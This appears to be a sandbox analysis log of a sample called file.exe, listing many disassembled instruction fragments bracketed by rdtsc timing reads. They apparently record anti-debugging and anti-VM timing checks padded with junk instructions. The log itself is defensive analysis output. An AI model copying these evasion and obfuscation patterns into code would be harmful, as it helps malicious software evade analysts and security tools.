                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3516D second address: C35177 instructions: 0x00000000 rdtsc 0x00000002 je 00007F68950EC3BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C351CA second address: C35210 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007F68950E7986h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d ja 00007F68950E7990h 0x00000013 nop 0x00000014 pushad 0x00000015 add bx, 2022h 0x0000001a mov ax, si 0x0000001d popad 0x0000001e add cx, 835Ch 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+122D2874h], esi 0x0000002b push C42FAFFCh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 jns 00007F68950E7986h 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C35210 second address: C35285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F68950EC3C8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 3BD05084h 0x00000014 sub dx, A802h 0x00000019 push 00000003h 0x0000001b mov edx, dword ptr [ebp+122D3485h] 0x00000021 push 00000000h 0x00000023 mov dl, al 0x00000025 mov dword ptr [ebp+122D3043h], esi 0x0000002b push 00000003h 0x0000002d jmp 00007F68950EC3C8h 0x00000032 push D734D59Dh 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F68950EC3C4h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C35285 second address: C3528B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3528B second address: C35290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C35290 second address: C35302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F68950E7986h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 1734D59Dh 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F68950E7988h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e lea ebx, dword ptr [ebp+12457060h] 0x00000034 call 00007F68950E798Eh 0x00000039 mov dword ptr [ebp+122D2370h], edx 0x0000003f pop edx 0x00000040 sbb esi, 2BD94603h 0x00000046 xchg eax, ebx 0x00000047 jmp 00007F68950E798Bh 0x0000004c push eax 0x0000004d push esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F68950E798Ch 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C353D2 second address: C353D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C35568 second address: C355B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 2FE5AB11h 0x0000000e sub dword ptr [ebp+122D33F4h], ebx 0x00000014 push 00000003h 0x00000016 or dword ptr [ebp+122D2FB2h], esi 0x0000001c push 00000000h 0x0000001e mov di, D026h 0x00000022 push 00000003h 0x00000024 pushad 0x00000025 jl 00007F68950E7988h 0x0000002b mov ah, 94h 0x0000002d mov eax, dword ptr [ebp+122D28EFh] 0x00000033 popad 0x00000034 call 00007F68950E7989h 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F68950E798Bh 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C355B3 second address: C3561D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F68950EC3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jg 00007F68950EC3B6h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F68950EC3C7h 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push edx 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 pop edx 0x00000022 pop edx 0x00000023 mov eax, dword ptr [eax] 0x00000025 jmp 00007F68950EC3C5h 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 jo 00007F68950EC3B6h 0x00000037 jmp 00007F68950EC3C0h 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3561D second address: C3564F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E798Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov cx, ax 0x0000000d mov edx, dword ptr [ebp+122D30F4h] 0x00000013 lea ebx, dword ptr [ebp+12457074h] 0x00000019 add dword ptr [ebp+122D278Dh], edx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jng 00007F68950E7988h 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52737 second address: C52751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F68950EC3C3h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52751 second address: C52755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52755 second address: C5275B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5275B second address: C5278D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7999h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F68950E7992h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52BA3 second address: C52BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3BDh 0x00000009 popad 0x0000000a js 00007F68950EC3CAh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52BBF second address: C52BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52BC3 second address: C52BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52D0A second address: C52D14 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F68950E7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52D14 second address: C52D27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jo 00007F68950EC3B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52FF6 second address: C53014 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F68950E7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jl 00007F68950E7986h 0x00000013 pop esi 0x00000014 popad 0x00000015 je 00007F68950E7996h 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53572 second address: C53577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53577 second address: C5357C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5357C second address: C53584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5373A second address: C5373E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5373E second address: C5374E instructions: 0x00000000 rdtsc 0x00000002 je 00007F68950EC3B6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5374E second address: C53754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53754 second address: C53771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3C9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C539E6 second address: C53A0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E798Ch 0x00000007 jmp 00007F68950E7991h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53F9D second address: C53FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F68950EC3BDh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C543DB second address: C543DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C546A6 second address: C546AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C546AC second address: C546B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C577E9 second address: C577EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C577EE second address: C577F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B626 second address: C5B633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B633 second address: C5B639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BA7E second address: C5BA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BA83 second address: C5BAA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7998h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BBE2 second address: C5BBE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5ABCF second address: C5ABD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60130 second address: C60144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68950EC3C0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C602A6 second address: C602AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C602AA second address: C602D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C602D0 second address: C602DF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jne 00007F68950E7986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C602DF second address: C602F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3C2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6042A second address: C60430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60430 second address: C60434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60434 second address: C6043E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F68950E7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60590 second address: C6059E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F68950EC3B6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6059E second address: C605C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F68950E7986h 0x0000000a popad 0x0000000b pushad 0x0000000c ja 00007F68950E7986h 0x00000012 jmp 00007F68950E798Ah 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a popad 0x0000001b push esi 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6088C second address: C608A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F68950EC3C7h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C608A8 second address: C608AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C608AE second address: C608B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60BB0 second address: C60BCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F68950E7998h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C634ED second address: C634F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C634F1 second address: C63502 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F68950E7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C639C0 second address: C639C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C639C4 second address: C639CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63A94 second address: C63AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F68950EC3BFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63AA8 second address: C63ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jp 00007F68950E7998h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63ABA second address: C63ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64073 second address: C64079 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64079 second address: C640A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jc 00007F68950EC3BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C640A2 second address: C640A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C640A6 second address: C64127 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F68950EC3B8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 call 00007F68950EC3BBh 0x00000027 jnp 00007F68950EC3C2h 0x0000002d call 00007F68950EC3BBh 0x00000032 pop esi 0x00000033 pop esi 0x00000034 adc di, B235h 0x00000039 push 00000000h 0x0000003b or esi, dword ptr [ebp+122D363Dh] 0x00000041 push 00000000h 0x00000043 jbe 00007F68950EC3BEh 0x00000049 push esi 0x0000004a xor dword ptr [ebp+122D2885h], ecx 0x00000050 pop esi 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F68950EC3C5h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C648A1 second address: C648AB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F68950E7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C648AB second address: C648B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C652CB second address: C652CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C648B0 second address: C648B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C65B2D second address: C65B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C664AD second address: C664B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C664B3 second address: C664B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C688D3 second address: C688DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F68950EC3B6h 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C688DE second address: C688FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68950E7999h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C688FB second address: C688FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C688FF second address: C6890B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6890B second address: C68911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C68911 second address: C68915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69B6D second address: C69B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69B73 second address: C69B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E4FE second address: C6E503 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72E48 second address: C72E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72E4C second address: C72E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72E50 second address: C72E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73E25 second address: C73E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7303A second address: C73045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73E29 second address: C73E3B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F68950EC3BAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73045 second address: C73059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007F68950E7986h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73E3B second address: C73E4C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F68950EC3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73E4C second address: C73E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73129 second address: C7312D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73FA4 second address: C74026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F68950E7988h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 pushad 0x00000013 mov edx, dword ptr [ebp+122D35B9h] 0x00000019 popad 0x0000001a mov bh, 63h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+1245DA56h], esi 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 js 00007F68950E798Ch 0x00000036 or dword ptr [ebp+122D2914h], esi 0x0000003c mov eax, dword ptr [ebp+122D1689h] 0x00000042 mov ebx, 70277ED7h 0x00000047 push FFFFFFFFh 0x00000049 sub dword ptr [ebp+122D328Dh], edi 0x0000004f nop 0x00000050 pushad 0x00000051 jmp 00007F68950E7992h 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 jmp 00007F68950E7993h 0x0000005e popad 0x0000005f popad 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
